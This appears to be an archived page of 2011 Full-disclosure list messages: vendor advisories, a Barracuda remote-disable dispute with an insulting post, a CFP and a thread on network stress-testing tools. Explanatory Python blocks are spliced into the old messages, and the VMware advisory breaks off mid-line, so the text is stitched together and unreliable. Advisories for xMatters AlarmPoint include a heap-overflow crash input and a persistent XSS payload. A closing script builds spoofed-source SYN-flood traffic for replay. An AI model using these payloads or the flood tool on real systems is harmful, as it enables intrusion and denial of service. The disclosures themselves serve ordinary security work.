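            kinds[(int(m.group(1)), int(m.group(2)))] += 1
    return kinds


def assess(vpxa_text, vmk_text, threshold=3):
    """Summarise both logs and flag the host once the combined hit count
    reaches the threshold. The threshold is an assumption for this example:
    one line may be a transient glitch, repeated lines within minutes are
    the pattern worth paging on."""
    vpxa_hits = count_matches(vpxa_text, VPXA_INDICATOR)
    vmk_hits = count_matches(vmk_text, VMK_INDICATOR)
    return {
        "vpxa_hits": vpxa_hits,
        "vmkernel_hits": vmk_hits,
        "failed_socket_kinds": dict(failed_socket_kinds(vmk_text)),
        "suspect_socket_exhaustion": vpxa_hits + vmk_hits >= threshold,
    }


if __name__ == "__main__":
    print(assess(VPXA_LOG, VMKERNEL_LOG))
```

In practice the two texts would be read from the host's vpxa and vmkernel log files (or from the syslog collector they are forwarded to) over a sliding time window; the indicator strings and the threshold are the only parts worth tuning.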

  b. Likewise package update
 
Updates to the vmware-esx-likewise-openldap and
vmware-esx-likewise-krb5 packages address several security issues.

One of the vulnerabilities is specific to Likewise while the other
vulnerabilities are present in the MIT version of krb5.
An incorrect assert() call in Likewise may lead to a termination
of the Likewise-open lsassd service if a username with an illegal
byte sequence is entered for user authentication when logging in to
the Active Directory domain of the ESXi/ESX host. This would lead to
a denial of service.
The MIT-krb5 vulnerabilities are detailed in MITKRB5-SA-2010-007.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-1786 (Likewise-only issue),
CVE-2010-1324, CVE-2010-1323, CVE-2010-4020, CVE-2010-4021 to these
issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware    Product   Running  Replace with/
Product   Version   on       Apply Patch
========  ========  =======  ====================
vCenter   any       Windows  not affected

hosted *  any       any      not affected

ESXi      4.1       ESXi     ESXi410-201104401-SG
ESXi      4.0       ESXi     not affected
ESXi      3.5       ESXi     not affected

ESX       4.1       ESX      ESX410-201104401-SG
ESX       4.0       ESX      not affected
ESX       3.5       ESX      not affected
ESX       3.0.3     ESX      not affected

  c. ESX third party update for Service Console kernel
   
The Service Console kernel is updated to include a fix for a
security issue.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Valdis . Kletnieks
On Thu, 28 Apr 2011 13:09:14 +0300, Tõnu Samuel said:

> One day their Barracuda product stopped working.

OK... That's hardly surprising, given the high-quality software engineering
that Barracuda is known for.. ;)

> Barracuda not only disabled all kind of subscription services but also
> used some kind of backdoor in their products to disable product customer
> had paid long time ago.

And I should believe this claim, why?

> Message was shown "Error: Activation has not been completed. Please
> activate your Barracuda Spam & Virus Firewall to enable functionality.
> (Click here to activate)". Customer was blocked to make any changes in
> admin interface of product. Even more irritating was fact that admin
> wanted to see why some e-mails were lost and was denied even to see logs!

Strong claims require strong evidence.  It's well-known that Barracuda turns
off subscription services if you don't pay - and even charges you back coverage
for years you skipped.  See the thread starting here:

http://mailman.nanog.org/pipermail/nanog/2011-April/035067.html

Now the question is - given that *that* Barracuda was at least semi-functional
even when off support, do we have any indication that your unit was in fact
intentionally disabled?  It could very well be the symptoms you are seeing are
the unit being just plain *broken*.



Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread corpus.defero
On Thu, 2011-04-28 at 08:29 -0700, ichib0d crane wrote:
(snipped)
> but that doesn't
> change the fact that Barracuda has done something likely bad here. A
> vendor should make it explicitly clear when they have the capability
> to disable remote products that have already been purchased. Maybe
> their ToS allows it, maybe not. Either way it is highly unethical.
> 
They can't. All they can do is disable updating of the virus and spam
definitions. It will still work without a subscription to 'energize
updates'.

There was once an obvious and open back door on these units redirecting
port 25 (naturally open on a firewall) to a listening SSH daemon for
IPs belonging to Barracuda. It was not very sophisticated, just an
IPTABLES rule.

Here is the rub with Barracuda - and forgive me for being rude but my
observations of them over the last few years have made them a bit of a chew
toy. The majority of their core team are either clueless retards or high
on drugs. Honestly, just tug apart some of the code in one of these
boxes and it is seriously lame to the point anyone who has progressed
past schoolboy BASIC will usually cry laughing.

Seriously, anyone who pays $£40k for one of these really needs to be put
into an institution as it is money very poorly spent. That's the end of
my contribution and now I must sleep until I see that name spring up
again somewhere else.


[Full-disclosure] ZDI-11-143: Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability

2011-04-28 Thread ZDI Disclosures
ZDI-11-143 (formerly ZDI-CAN-965): Cisco Unified CallManager
xmldirectorylist.jsp SQL Injection Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-143

April 28, 2011

-- CVE ID:
CVE-2011-1610

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Cisco

-- Affected Products:
Cisco Call Manager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10889. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to inject arbitrary SQL into
the backend database on vulnerable installations of Cisco Unified CM.
Authentication is not required to exploit this vulnerability. 

The specific flaw exists within the Call Manager component. The system
exposes an Apache webserver which contains a JSP script vulnerable to
SQL injection. The xmldirectorylist.jsp file does not properly validate
the f, l, and n parameters before passing them to the database. A remote
attacker can abuse this to inject SQL statements to be evaluated by the
underlying database.
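The root cause named above, request parameters reaching the database as part of the SQL text, is easiest to see next to its fix. The Python below is an added example, not Cisco's code or anything from the advisory: a constructed in-memory directory table (sqlite3 stands in for the real backend) is queried once by string concatenation and once with bound parameters, and a small allowlist for search terms is shown as a second layer. The column names mirror the f, l and n parameters; the rows, the function names and the allowlist pattern are assumptions.

```python
import re
import sqlite3

# Constructed directory rows standing in for the backend database.
ROWS = [
    ("Alice", "Anders", "1001"),
    ("Bob", "Baker", "1002"),
    ("Carol", "Cruz", "1003"),
]


def make_directory_db():
    """In-memory table whose columns mirror the f, l and n request parameters."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE directory (f TEXT, l TEXT, n TEXT)")
    conn.executemany("INSERT INTO directory VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, f, l, n):
    """Vulnerable pattern: the parameters are pasted into the SQL text, so a
    quote character in any of them changes the structure of the query."""
    sql = (
        "SELECT f, l, n FROM directory WHERE f LIKE '" + f + "%' "
        "AND l LIKE '" + l + "%' AND n LIKE '" + n + "%'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, f, l, n):
    """Hardened form: bound parameters keep the values out of the SQL text,
    so the same input is matched as a literal search term and nothing else."""
    sql = "SELECT f, l, n FROM directory WHERE f LIKE ? AND l LIKE ? AND n LIKE ?"
    return conn.execute(sql, (f + "%", l + "%", n + "%")).fetchall()


# Assumed allowlist for a directory search term: letters, digits, spaces and
# the punctuation that occurs in names. It excludes '%' and '_' on purpose,
# because those remain LIKE wildcards even when bound as parameters.
_SEARCH_TERM = re.compile(r"^[A-Za-z0-9 .'-]{0,64}\Z")


def validate_term(value):
    """Second layer of defence: reject input a directory search never needs."""
    return _SEARCH_TERM.match(value) is not None


if __name__ == "__main__":
    conn = make_directory_db()
    print(lookup_parameterized(conn, "A", "", ""))
```

Bound parameters fix the injection on their own; the allowlist is there because LIKE treats `%` and `_` in a bound value as wildcards, which is a separate enumeration concern that parameterization does not address.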

-- Vendor Response:
Cisco has issued an update to correct this vulnerability. More
details can be found at:

http://www.cisco.com/warp/public/707/cisco-sa-20110427-cucm.shtml

-- Disclosure Timeline:
2010-11-05 - Vulnerability reported to vendor
2011-04-28 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sven Taute

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



Re: [Full-disclosure] Requesting/Reserving CVE Question

2011-04-28 Thread Henri Salo
On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com wrote:
> Hello all,
> 
> First off, if this isn't the place to ask this question, I apologize, and
> feel free to ignore this e-mail.  
> 
> I've found a couple vulnerabilities in a web forum/portal/etc. product
> called IP.Board.  I was looking to reserve a CVE number, and I attempted to
> contact the address Mitre lists for reserving one, however, it's been
> nearly a month and I have not received anything back from them.  This is
> the first vulnerability I have found, and have never requested/reserved a
> CVE before, so I am a little unfamiliar with the process (although based
> off of the following website, it looks like all I need to do is send an
> e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
> 
> I've sent follow up e-mails and I've received no response.  My
> question to you all is, how long does this process take?  Is there something
> else that should be done, or someone else the request should be sent to? 
> What's the normal time frame from requesting a CVE number to hearing back
> from them?
> 
> Thanks for any help/info/advice.  I appreciate it.
> 
> Chris

No luck. With open-source you could have tried:
http://oss-security.openwall.org/wiki/mailing-lists/oss-security

Best regards,
Henri Salo



Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread ichib0d crane
Why is everyone ripping on this fellow just because he chose to
purchase a 'solution'? That's not the issue here at all. Sure he
should've done something more custom and open source, but that doesn't
change the fact that Barracuda has done something likely bad here. A
vendor should make it explicitly clear when they have the capability
to disable remote products that have already been purchased. Maybe
their ToS allows it, maybe not. Either way it is highly unethical.



[Full-disclosure] Requesting/Reserving CVE Question

2011-04-28 Thread ctruncer
Hello all,

First off, if this isn't the place to ask this question, I apologize, and
feel free to ignore this e-mail.  

I've found a couple vulnerabilities in a web forum/portal/etc. product
called IP.Board.  I was looking to reserve a CVE number, and I attempted to
contact the address Mitre lists for reserving one, however, it's been
nearly a month and I have not received anything back from them.  This is
the first vulnerability I have found, and have never requested/reserved a
CVE before, so I am a little unfamiliar with the process (although based
off of the following website, it looks like all I need to do is send an
e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  

I've sent follow up e-mails and I've received no response.  My
question to you all is, how long does this process take?  Is there something
else that should be done, or someone else the request should be sent to? 
What's the normal time frame from requesting a CVE number to hearing back
from them?

Thanks for any help/info/advice.  I appreciate it.

Chris



[Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread Juan Sacco
 Information
 
 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High
 Researcher : Juan Sacco 

 Description
 --
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 ---
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follows:
 Submit a malicious file containing the exploit
 root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$  
 ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print "\x90"*16287'`
 Starting program: 
 /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 
 'print "\x90"*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax            0xa303924        170932516
 ecx            0xbfb8           49080
 edx            0xa303924        170932516
 ebx            0x8059438        134583352
 esp            0xbfff3620       0xbfff3620
 ebp            0xbfff3638       0xbfff3638
 esi            0x8059440        134583360
 edi            0x80653f0        134632432
 eip            0x804be8a        0x804be8a
 eflags         0x210206         [ PF IF RF ID ]
 cs             0x73             115
 ss             0x7b             123
 ds             0x7b             123
 es             0x7b             123
 fs             0x0              0
 gs             0x33             51
 (gdb)


 Solution
 ---
 No patches are available at this time.

 Credits
 ---
 Manually discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released, stay tuned



Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread corpus.defero
On Thu, 2011-04-28 at 13:09 +0300, Tõnu Samuel wrote:
> Hello!
> 
> We have alarming case with Barracuda products here.
> 
It's your own fault for buying one and being too lazy to create your own
anti-spam solution! It's all pretty much OSS and rubbish hardware and
any half decent Linux admin can easily fashion a system to do what the
Barracuda does {some caveats around the UI (itself poor and slow)}

If you Googled you would have found this as a starter for 10.

http://www.waraxe.us/ftopict-5340.html





[Full-disclosure] hashdays 2011 - Call for Papers (#days CFP)

2011-04-28 Thread Hashdays CFP
Call for Papers for hashdays 2011 (#days)


Introduction

Hashdays is an international security technology and research conference
which is preceded by several 2-day workshops delivering IT security
training. The event features many international IT security experts
sharing their deep technical knowledge in an open environment and takes
place October 26th to 29th, 2011 in Lucerne. The conference is unique in
Switzerland and is organized by DEFCON Switzerland, a non-profit
association with the aim to give experts and professionals a platform to
transfer insights into the information security domain and to sensitize
users to information security topics. The official conference web site
is located at: https://www.hashdays.ch.

The Call For Papers (CFP) is now open and we are accepting interesting and
innovative proposals for 50-minute talks.

Please follow the guidelines below when submitting.

Scope
-
In particular, we are looking for topics in the following domains:
* Operating system and application security
* Wired and wireless network security
* Mobile communication security
* Forensics and anti-forensics
* Digital privacy and anonymous communication
* Reverse engineering of software and hardware
* Malware collection and analysis
* Botnet analysis
* Electronic voting
* Security metrics and visualization
* Intrusion detection and prevention
* Cloud computing security
* Cryptography and security protocols
* Biometric system security
* Quantitative and model based IT risk management

Submissions from academic and scientific institutions are welcome.

Deadlines
-
* Submission of package until: Sunday, July 3rd, 2011
* Latest notification date: Sunday, August 28th, 2011

Submission Guidelines
-
The submission package is assessed by the program committee and the
author is notified on the outcome by electronic means. Your submission
package must be delivered in non-proprietary electronic formats (e.g.
PDF, OpenOffice) and contain the following:

Talk details:
* Either:
o a proposal of your intended talk with at maximum 400 words XOR
o a full paper with a minimum of 6 and a maximum of 12 pages XOR
o a slide deck with a maximum of 45 slides
* 150 word abstract of the talk which will be displayed on our
conference website
* Rationale why your material is significant and should be presented
* Information on whether this talk has been or will be presented elsewhere
* Samples of other materials which might help to assess your submission
(optional)
* Links to your web presence, if relevant (optional)

Presenter details:
* Your name and contact information
* Location of residence
* Country where the passport was issued
* Name of employer and/or affiliations (optional)
* 150 word biography of the speaker for use on our conference website
* A photo of yourself which is shown along with your biography (optional)
* List of previous significant talks (topic and name of conference)
* List of publications

To submit your CFP, put all the requested information into an archive and
send it by e-mail to c...@defcon-switzerland.org.

Speaker Benefits

We offer the following benefits to accepted speakers:
* Free admission for the two conference days (including lunches and
coffee breaks)
* Invitation to the complimentary speaker's dinner
* Paid accommodation for two nights at the hotel where the conference
takes place
* Reimbursement of travel expenses in economy class up to a certain amount

However, we can reimburse travel and accommodation for one person per
talk only.

Terms
-
The author of the content keeps his or her full rights on the submitted
material. By submitting the CFP package the author agrees to the
following terms:
* You confirm that the material submitted is your own except for where
explicit references to third-party works are made.
* You confirm that you have obtained permission to use and distribute
third-party content, like images.
* You give permission to DEFCON Switzerland to publish/distribute
your material in either physical or electronic format without royalty.
* You give permission to DEFCON Switzerland to create audio and video
recordings of your presentation and publish/distribute these without
royalty.
* You agree that travel and accommodation expenses are reimbursed only
upon successful delivery of your talk and upon presenting the receipts.
* You agree to read out a disclaimer to the audience at the beginning
of your presentation if deemed necessary by DEFCON Switzerland.
* You agree not to hold DEFCON Switzerland liable for any direct or
indirect damages or costs in case the event is cancelled.

Sponsoring
--
If you like our conference, you can support us by sponsoring. We offer
attractive sponsoring opportunities. For details please contact:
sponsor...@defcon-switzerland.org.

Thank you and best regards,
#days organizing committee

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Tõnu Samuel
On Thu, 2011-04-28 at 12:59 +0200, Christian Sciberras wrote:
> Oh I'm sure someone on the list is going to help you.
> Just give us SSH and root access and we'll do the hard work for you.
> See, that's being open, not closed...!

Sure someone can do. I happen to know some people who are able to
reverse engineer anything on a PC but they are busy doing useful stuff
instead of proving someone's bad intentions in Barracuda. To me it looks
like the only correct way for Barracuda is to issue a clear statement that
they remove all such "features" from their products and issue a free
patch for this. 

And yes, I am sure if Barracuda will act to hide problem we soon see
what else community find out.

World is weird. I happen to be writing a review on the whole Barracuda product line
at the same time. I will praise their product as "works out of the box" and
meanwhile I do not recommend such a timebomb in the server room but paying some
guy to configure postfix with all the proper addons instead. Also this fact
already changed two "go" decisions for Barracuda to "no-go" ones among my
close contacts. 

  Tõnu


Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread James Lay

On 4/28/11 4:09 AM, "Tõnu Samuel"  wrote:

>
>admin interface of product. Even more irritating was fact that admin
>wanted to see why some e-mails were lost and was denied even to see logs!
>


Heh...yank the drive and mount it in a Linux box...it's just Mandrake
Linux anyway (most likely going against the GPL since they are using ClamAV
and SpamAssassin).

J




Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Christian Sciberras
Oh I'm sure someone on the list is going to help you.

Just give us SSH and root access and we'll do the hard work for you.

See, that's being open, not closed...!







On Thu, Apr 28, 2011 at 12:51 PM, Tõnu Samuel  wrote:

> On Thu, 2011-04-28 at 11:45 +0100, Benji wrote:
> > Do you actually have any evidence of a backdoor? Or could this just be
> > a remote 'turn-off' switch as such? I'm not saying that one is better
> > than the other, but they are very different features.
>
> I have no idea how this is technically implemented or what else they can
> do. This is a clear example of closed source product dangers. Today we
> found some "switch off", tomorrow what? How can we be sure about
> anything? The only thing I am sure of now: they kept a copy of the keys to the house you
> bought from them years ago and they used those keys for an illegal thing.
>
>  Tõnu
>

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Tõnu Samuel
On Thu, 2011-04-28 at 11:45 +0100, Benji wrote:
> Do you actually have any evidence of a backdoor? Or could this just be
> a remote 'turn-off' switch as such? I'm not saying that one is better
> than the other, but they are very different features.

I have no idea how this is technically implemented or what else they can
do. This is a clear example of closed source product dangers. Today we
found some "switch off", tomorrow what? How can we be sure about
anything? The only thing I am sure of now: they kept a copy of the keys to the house you
bought from them years ago and they used those keys for an illegal thing.

  Tõnu


Re: [Full-disclosure] Stress Testing Tools

2011-04-28 Thread BGA
Hi,

for ddos testing:
T50
ddossim
netstress(commercial)
---
Huzeyfe ONAL
Bilgi Güvenliği AKADEMİSİ
http://www.bga.com.tr

BGA Ankara & İstanbul Training Schedule
http://www.bga.com.tr/?page_id=944

 ---



On Wed, Apr 27, 2011 at 12:44 PM, Oscar  wrote:

> Hi,
>
> I am also on the verge of testing firewall/IDS/IPS; currently I am looking at
> some DOS/DDOS/stress testing tools. Please help me with that.
>
> Thanks in Advance
> Oscar
>
> On Wed, Apr 27, 2011 at 11:17 AM, Sec Tools  wrote:
>
>>  I've been using a combination of Mausezahn (
>> http://www.perihel.at/sec/mz/index.html ), Tcpreplay (
>> http://tcpreplay.synfin.net ) and some times Scapy (
>> http://www.secdev.org/projects/scapy/ ) for our 1G/10G network stress
>> testing needs ( mostly for probing and checking the resilience of new
>> network appliances ).
>>
>> I noted that these tools were not updated recently (for one year aprox).
>> Do you guys have any suggestions on better approaches / really good new
>> tools to do this? ( note that currently our budget does not allow the use of
>> hardware based solutions ).
>>
>> Best Regards,
>>
>> John James
>> http://sectools.org/
>>
>
>

Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread Benji
Do you actually have any evidence of a backdoor? Or could this just be a
remote 'turn-off' switch as such? I'm not saying that one is better than the
other, but they are very different features.

On Thu, Apr 28, 2011 at 11:09 AM, Tõnu Samuel  wrote:

> Hello!
>
> We have an alarming case with Barracuda products here.
>
> Customer bought Barracuda hardware years ago and paid for it. No leasing
> etc. Product is Barracuda Spam Firewall 800 which is a $40k product.
> Customer also paid for not-so-cheap annual subscription fees each year.
>
> One day their Barracuda product stopped working.
>
> After investigating the problem it came out that the Barracuda reseller and
> Barracuda itself have some misunderstandings and because of this
> Barracuda not only disabled all kinds of subscription services but also
> used some kind of backdoor in their products to disable a product the customer
> had paid for a long time ago.
>
> Message was shown "Error: Activation has not been completed. Please
> activate your Barracuda Spam & Virus Firewall to enable functionality.
> (Click here to activate)". Customer was blocked from making any changes in
> the admin interface of the product. Even more irritating was the fact that the admin
> wanted to see why some e-mails were lost and was denied even seeing the logs!
>
> Notice - Barracuda have not just disabled some online services (which
> were paid for too) but they remotely disabled a hardware product which does
> not belong to them.
>
> I think users should be warned about companies like Barracuda. As much as I
> understand this is also a criminal violation to sabotage some other
> company's network resources.
>
>   Tõnu
>

[Full-disclosure] Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint

2011-04-28 Thread Juan Sacco
 Information
 
 Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web 
 Server API
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Cross-Site Scripting
 Severity : High
 Researcher : Juan Sacco 

 Description
 --
 The AlarmPoint Java Server consists of a collection of software  
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to 
 AlarmPoint.

 Details
 ---
 AlarmPoint Java Web Server API is affected by a Persistent XSS 
 vulnerability in version 3.2.1

 Exploit as follows:
 Insert a new HTTP API with the following malicious code:
 
 

Alive


ping

 '>alert(/XSS/)

 Go to: http://example.com:2010/agent/status.html
 Response:
 AgentStatus
 3.2.1 (Build 
 
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'>alert(/XSS/)

 Cross-Site Scripting attacks are a type of injection problem, in which 
 malicious scripts are injected into the otherwise benign and trusted web 
 sites.
 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
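What makes the flaw above persistent is that the API name is stored and then echoed into the status page for every later visitor. The Python below is an added example, not code from xMatters or from the advisory: a constructed stand-in for such a status page, rendered once with the stored name dropped into the markup verbatim and once with it entity-encoded at output time, plus an allowlist check for API names at storage time. The class, the function names and the sample payload (modelled on the advisory's alert(/XSS/)) are assumptions.

```python
import html
import re

# Constructed payload modelled on the advisory's; the surrounding quote and
# angle bracket are what break out of the stored value's context.
MALICIOUS_NAME = "ping'><script>alert(/XSS/)</script>"


class AgentStatusPage:
    """Stand-in for a status page that lists the HTTP APIs an agent has been
    configured with. Names are persisted, which is what makes an injected
    name 'persistent': every later visitor receives it."""

    def __init__(self):
        self._api_names = []

    def add_api(self, name):
        self._api_names.append(name)

    def render_vulnerable(self):
        # Stored names are dropped into the markup verbatim.
        rows = "".join("<tr><td>%s</td></tr>" % name for name in self._api_names)
        return "<html><body><h1>AgentStatus</h1><table>%s</table></body></html>" % rows

    def render_hardened(self):
        # Every stored value is entity-encoded for an HTML text context at
        # output time; quote=True also covers attribute contexts.
        rows = "".join(
            "<tr><td>%s</td></tr>" % html.escape(name, quote=True)
            for name in self._api_names
        )
        return "<html><body><h1>AgentStatus</h1><table>%s</table></body></html>" % rows


# Assumed allowlist for an API name: a short identifier, nothing that could be
# markup. Storage-time validation is the second layer; output encoding is the
# first, because stored data may also arrive through other paths.
_API_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}\Z")


def valid_api_name(name):
    return _API_NAME.match(name) is not None


# Crude check used to demonstrate the difference: does anything inside a
# rendered table cell still parse as a tag or an event handler attribute?
_TAG_OR_HANDLER = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)


def active_markup_in_cell(rendered):
    cells = re.findall(r"<td>(.*?)</td>", rendered, re.DOTALL)
    return any(_TAG_OR_HANDLER.search(cell) for cell in cells)


if __name__ == "__main__":
    page = AgentStatusPage()
    page.add_api("Alive")
    page.add_api(MALICIOUS_NAME)
    print(page.render_hardened())
```

Encoding at output time, in the context the value lands in, is the fix; the allowlist merely shrinks what can be stored in the first place and does not replace it.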

 Solution
 ---
 No patches are available at this time.

 Credits
 ---
 Manually discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released, stay tuned



[Full-disclosure] Barracuda backdoor

2011-04-28 Thread Tõnu Samuel
Hello!

We have an alarming case with Barracuda products here.

Customer bought Barracuda hardware years ago and paid for it. No leasing 
etc. Product is Barracuda Spam Firewall 800 which is a $40k product. 
Customer also paid for not-so-cheap annual subscription fees each year.

One day their Barracuda product stopped working.

After investigating the problem it came out that the Barracuda reseller and 
Barracuda itself have some misunderstandings and because of this 
Barracuda not only disabled all kinds of subscription services but also 
used some kind of backdoor in their products to disable a product the customer 
had paid for a long time ago.

Message was shown "Error: Activation has not been completed. Please 
activate your Barracuda Spam & Virus Firewall to enable functionality. 
(Click here to activate)". Customer was blocked from making any changes in 
the admin interface of the product. Even more irritating was the fact that the admin 
wanted to see why some e-mails were lost and was denied even seeing the logs!

Notice - Barracuda have not just disabled some online services (which 
were paid for too) but they remotely disabled a hardware product which does 
not belong to them.

I think users should be warned about companies like Barracuda. As much as I 
understand this is also a criminal violation to sabotage some other 
company's network resources.

   Tõnu



Re: [Full-disclosure] Stress Testing Tools

2011-04-28 Thread Oscar
Hi,

I am also on the verge of testing firewall/IDS/IPS; currently I am looking at
some DOS/DDOS/stress testing tools. Please help me with that.

Thanks in Advance
Oscar

On Wed, Apr 27, 2011 at 11:17 AM, Sec Tools  wrote:

>  I've been using a combination of Mausezahn (
> http://www.perihel.at/sec/mz/index.html ), Tcpreplay (
> http://tcpreplay.synfin.net ) and some times Scapy (
> http://www.secdev.org/projects/scapy/ ) for our 1G/10G network stress
> testing needs ( mostly for probing and checking the resilience of new
> network appliances ).
>
> I noted that these tools were not updated recently (for approximately one year). Do
> you guys have any suggestions on better approaches / really good new tools
> to do this? ( note that currently our budget does not allow the use of
> hardware based solutions ).
>
> Best Regards,
>
> John James
> http://sectools.org/
>
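Tcpreplay, mentioned above, replays whatever is in a pcap file, so the quality of a stress test depends on the pcap you feed it. The following is an added example (not code from either poster) that builds a SYN-flood pcap with correct IPv4 and TCP checksums using only the Python standard library and then verifies it by parsing it back. The target 10.0.0.5:80, the MAC addresses and the 10.0.0.0/8 source range are assumptions for a lab appliance; point them at your own device under test.

```python
"""Build a pcap of TCP SYN frames for replay with tcpreplay.

Added example, not code from the thread. The target address, port and MACs
are assumptions for a lab appliance; point them at your own device under test.
"""
import random
import struct
import time

PCAP_MAGIC = 0xA1B2C3D4          # libpcap magic, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
# Assumed lab addressing (not from the original post).
SRC_MAC = bytes.fromhex("02000000aa01")
DST_MAC = bytes.fromhex("02000000bb02")


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words (odd length padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ipv4_header(src: str, dst: str, payload_len: int, ident: int) -> bytes:
    """20-byte IPv4 header (DF set, TTL 64, proto TCP) with checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      0x4000, 64, 6, 0, ip_bytes(src), ip_bytes(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_syn_header(src: str, dst: str, sport: int, dport: int, seq: int) -> bytes:
    """20-byte TCP header with only SYN set; checksum covers the pseudo-header."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02,
                      65535, 0, 0)
    pseudo = ip_bytes(src) + ip_bytes(dst) + struct.pack("!BBH", 0, 6, len(hdr))
    return hdr[:16] + struct.pack("!H", checksum(pseudo + hdr)) + hdr[18:]


def build_syn_pcap(target_ip: str, target_port: int, count: int,
                   seed: int = 1) -> bytes:
    """Return a complete pcap (as bytes) holding `count` SYN frames from
    randomised 10.0.0.0/8 source addresses and ephemeral ports to the target."""
    rng = random.Random(seed)          # seeded so a run is reproducible
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535,
                       LINKTYPE_ETHERNET)]
    base = int(time.time())
    for i in range(count):
        src = "10.%d.%d.%d" % (rng.randrange(256), rng.randrange(256),
                               rng.randrange(1, 255))
        tcp = tcp_syn_header(src, target_ip, rng.randrange(1024, 65536),
                             target_port, rng.getrandbits(32))
        frame = (DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_IPV4)
                 + ipv4_header(src, target_ip, len(tcp), i & 0xFFFF) + tcp)
        # frames 10 us apart; tcpreplay --topspeed ignores these timestamps
        ts_sec, ts_usec = base + (i * 10) // 1_000_000, (i * 10) % 1_000_000
        out.append(struct.pack("<IIII", ts_sec, ts_usec, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)


def verify_pcap(data: bytes):
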